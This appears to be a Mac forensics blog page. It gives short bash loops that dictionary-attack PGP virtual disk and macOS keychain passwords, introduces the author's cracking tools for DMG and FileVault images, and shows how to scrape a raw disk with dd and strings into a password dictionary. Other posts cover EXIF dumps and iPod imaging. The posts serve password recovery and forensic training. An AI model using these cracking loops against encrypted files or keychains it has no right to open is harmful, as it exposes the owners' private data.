Mac Shell Script – Crack PGP Virtual Disk (PGD)

Today I was not up for doing any full program code.  On top of that I recorded an upcoming Typical Mac User show with Victor answering some listener questions about file encryption.  One of the things we talked about was PGP for Mac.  I got to wondering.  What are the odds that they provide a command line option for mounting PGP encrypted discs?  Can I do yet another dictionary attack script?

Here is what I have initially found.  Note we are talking about a PGP virtual disk file setup for passphase NOT key authentication.  You must have the commercial Mac PGP Whole Disk Encryption application installed.

There is a pgpdisk –mount command.  So can we toss it in a loop like we did for DMG files?  Why of course we can!  Note that you need to change to the desired dictionary path and file.   Same for the target .PGD file you want.  Note on the PGD file my example is PGPTest with the full path minus the extension in the below example.

You will notice when you run your attack that you see some text about “Error -11998 – buffer too small”  This is because normally if the passphrase you enter is wrong it will prompt you three more times.  The way we are piping in at the front of the line with the echo we cause it to error and ignore those multiple entry attempts and keep going through our dictionary file.

#!/bin/bash

for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v “#”)

do

echo -n $word | pgpdisk –mount /Volumes/MyBook/PGPDisks/PGPTest –passphrase $word

if [[ $? = 0 ]]

then

echo “Password found!”

echo $word

exit 0

fi

done

echo “password not found :(”

exit 1

Share

crowbarKC-Version 1.0

I decided to make a quick version of crowbarDMG that works on OSX Keychain files.  So here you go.  Right now in v1.0 it only works exactly as crowbarDMG does and finds the main unlock password.  It is a good deal faster testing keychain files than disc images.   Like crowbarDMG it is Leopard only.  I am looking out a way to dump the contents of a keychain once it unlocks.  If I can come up with a good solution I will release an update via the auto update mechanism.

Thanks to the following code and frameworks: 

crowbarKC
crowbarKC
Share

Mac Shell Script – Crack Keychain

While I work out an updated copy of crowbarDMG to go after keychains I wanted to give you a quick shell script to achieve the same thing.  Long time ago I posted a script for going after DMG files.  It takes only a slight edit to make it work for keychain files.  You will want to change the test.txt file for your dictionary file and keytest.keychain for your desired file.

#!/bin/bash

for word in $(cat ~/test.txt | grep -v “#”)

do

security unlock-keychain -p $word ~/keytest.keychain

if [[ $? = 0 ]]

then
echo “Password found”
echo $word
exit 0

fi

done
echo “Password not found”
exit 1

Share

Strings on a dd image

It is a common forensics technique to run strings against a disc image.  One issue I ran into in testing my crowbarDMG tool was that often this leaves a lot of control characters in the file.  So here is a way to remove the non-printable characters out of your dictionary file.  I also added the “%@” string to the scrape since I found that would crash my program.  In a future update I will provide an automatic filtering of those problem character.  It uses the tr command instead of sed or awk.

tr -d ‘\001’-‘\011”\013”\014”\016’-‘\037”\200’-‘\377’’%@’ < dictionary.txt > dictionary-cleaned.txt

Update:

For those who do not want to mess with the command line to clean up their dictionary you can download this in an automator app wrapper HERE

Share

crowbarDMG – Version 1.0

Well here we are.  Finally, my very first full Cocoa program. One that does not come from a book.

crowbarDMG is a dictionary attack tool for DMG and Spareimage files for Macs.  It does require 10.5 Leopard.  It really wasn’t worth the trouble to redo things to work on Tiger.  It is completely free, so enjoy.  Be sure to read the included PDF readme file.  I address an issue if you use strings to pull out a dictionary from a disc image.  Some control characters need to be scrubbed else it will crash crowbarDMG.  Give it a shot if you need to recover a password for a dmg or filevault file.

*UPDATE* – Please make sure to run Check for Updates to obtain the latest build.  I have released v1.0.1 that implements garbage collection to help prevent memory leaks for long duration projects.

Thanks to Paul Figgiani for his patience in making GUI layout and improvement suggestions.

Thanks to Big Nerd Ranch for the fun bootcamp last October.  I would have never had the time to get up to speed on Xcode and ObjectiveC purely on my own.

Thanks as well to the following code and frameworks:

crowbarDMG – Download
Share

Exif Data Dump

I was working on some exercises for the Sans SEC-508 forensics class.  Being the lazy person that I am.  Rather than manually extract exif data from the recovered images I made an automator to do it for me.  I had some issues trying to use some code that previously worked under Tiger.  So here it is for Leopard.  Only down side is that it breaks if the path or filename has a space in it.  

Note you do need Phil Harvey’s ExifTool installed.

ExifDump Uploaded with plasq‘s Skitch!
Share

Making a dictionary file.

I realize it has been a while since I posted on the full blog.  I do minor things via twitter.  Toss in the holidays, then lots of stuff to start the year = lazy on the blog.  

I have been writing my first real program on OSX in Cocoa.  A disc image (DMG) dictionary attack tool.  It is coming along nicely and once done I will throw it out to the public intended as a free tool to Mac based forensics examiners.  I have posted on here before about a shell script to do this.  Making the program native in Cocoa means a lot more options etc.  Not to mention fun for me to learn.

Filevault is nothing but an encrypted sparseimage disc image file.  So in my testing I wanted to see if my tool could crack my own filevault.  To do this I needed a reasonably targeted dictionary file.  So in a pinch here is a fun way to make a simple attack dictionary.  

  1. Open Terminal
  2. df
    This command shows disc usage and what discs are mounted.  Lets say this ipod is actually my other laptop connected via firewire target disc mode.  Notice below the root drive  is shown and it is is disk0s2. 

    /dev/disk2s3    117013560  93569848  23443712    80% /Volumes/iPod

  3. dd if=/dev/rdisk2 | strings > myDictionary.txt
  4. Wait a good long time if the drive is large.  You are streaming the drive level blocks through the strings command to extract all readable ascii strings into a nice text file.

So I used that file for going after the filevault spareimage file from my old laptop using my dictionary attack tool.  I got lucky my password was in the strings but not by itself.  It was embedded in some other text.  I had to find it with grep against myDictionary.txt.  It was cached way back in time in the unencrypted space on my hard drive by some third party tool.  So without some extra work it would not have actually cracked my filevault.  But it sure came close.  And from a 40GB old powerbook drive it would have only taken 3 days to run the full myDictionary.txt file against my filevault.

Share

iPod – Imaging and Data Recovery

One of the guys from the Nashville Mac Users group asked me about recovering some audio files from an iPod.  A friend of his used an iTalk to record some audio.  About 200MB with of audio file.  For some reason it is not sync’ing from the iPod.  He also has no idea which of his many macs is the master to the iPod.  He would have to let it wipe it out to associate it to a new mac he is sure of as the master.  So I got to playing around.   My iPod is in disk mode.

  1. Open Terminal
  2. df
    This command shows disc usage and what discs are mounted.  Notice below the iPod is shown and it is is disk2s3.  Keep in mind the main disk# can change every time you reboot if you have multiple external drives. 

    /dev/disk2s3                             117013560  93569848  23443712    80%    /Volumes/iPod

  3. I have an external sata with way more free space than my ipod is big. (60GB)
  4. dd bs=512 if=/dev/rdisk2 of=/Volumes/ExtSata/ipodimage.dmg
    This command does a disc image of the raw disk#2 matching up to what we saw in step 2 above.  You want the raw disk (rdisk) since it is faster for making an image.   So we use a block size of 512 (bs) from an input file (if) of /dev/rdisk2 to an output file (of) of /Volumes/ExtSata/ipodimage.dmg
  5. Wait a really long time (was over night) and when the dmg file shows in finder as large as the iPod close terminal, eject the real ipod and try double clicking on the new ipodimage.dmg file.

For me it opened up fine mounting as a disc image.  I could then browse  the contents of the iPod.  Of course I could feed it to one of my forensic tools since it is a disc image and easy to parse with file recovery tools etc.  Now that I know it works.  The question is can I use this to get past any issues on the fellow’s ipod to drag his audio files out of the disc image.  If we encountered any errors I would do the DD command again but add conf=sync,noerror at the end.

The noerror tells DD to keep going and not end if it hits an error.  The sync tells DD to  pad any error spots with null.  That is an attempt to get around any errors on the disc.

Share